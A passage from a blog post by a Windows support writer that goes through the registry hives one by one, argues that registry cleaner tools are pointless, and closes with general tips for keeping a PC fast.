time that I see broken references like this on a consumer system is where malicious browser helper objects have been whacked out by an antivirus product and it has been sloppy about the cleanup. So, no need for cleaning in this bit of the registry.

HKEY_CURRENT_USER is a phantasm. It just points to a specific user in HKEY_USERS. RegEdit is a habitual liar. Just because you can see it is no reason to think it exists and just because you can’t doesn’t mean that it doesn’t exist. So, no need for a registry cleaner there.

HKEY_LOCAL_MACHINE is the home of some interesting things. All the driver settings live here and the settings for a great many third party components and Windows settings. You could have dead entries in here if software was deleted without removing its settings but that wouldn’t have a great deal of effect on performance as there is not a linear search algorithm for these things. Dead entries just use a bit of space. It would be pretty dangerous to clean up entries without knowing what they represented and there wouldn’t be much point. Removing driver settings, security settings and so on would break things badly. No call for a registry cleaner there then. It isn’t that dirty.

HKEY_USERS has a branch for each user account and if you look there, you will see some well known SIDs (security IDs) and some less well known ones that probably represent real users. There will be user specific software settings. Actually, a lot of these settings will never be used for anything. I have a guest account on the system where I am writing this. It is disabled which is the best thing to do with a guest account. If I don’t know you well enough to give you an account of your own, you have no business running code on this box. Looking at the guest account, it has settings for the AV product installed, my Creative Zen, iTunes and all sorts of things that get installed for all users by default. Switching quickly to the admin account gives a last login date for the GUEST account of never. No-one has ever used those settings and they never will. My ASP.NET account doesn’t use those settings either. It exists solely to run ASP.NET code in a very limited environment. Now, something could usefully clean up some of those entries but no tool that I know does that. Oh well, it is just some memory bloat. The one place where it would be of some use, no registry cleaner reaches. Oh well.

HKEY_CURRENT_CONFIG is just another phantom pointing at specific entries in HKEY_CURRENT_USER.

If you want to keep your system nice and spry, here is my advice:
1. Add memory. These days, if you are not hard against your address space limits then you are running on 64 bit.
2. Do not load things that you do not need. Autoruns from Sysinternals as was is a fine tool for seeing how much junk loads each time that you start up. It is amazing what you can remove without ever missing it.
3. Defrag your hard drive once in a while.
4. Stay malware free.

That is what I do and this machine is used every day and still runs pretty darn sweet. The OS was installed in 2004. Remember when the OS had to be reinstalled every few months? No need for that and, in my opinion, no need for registry cleaner tools.

Signing off,

Mark Long, Digital Looking Glass Ltd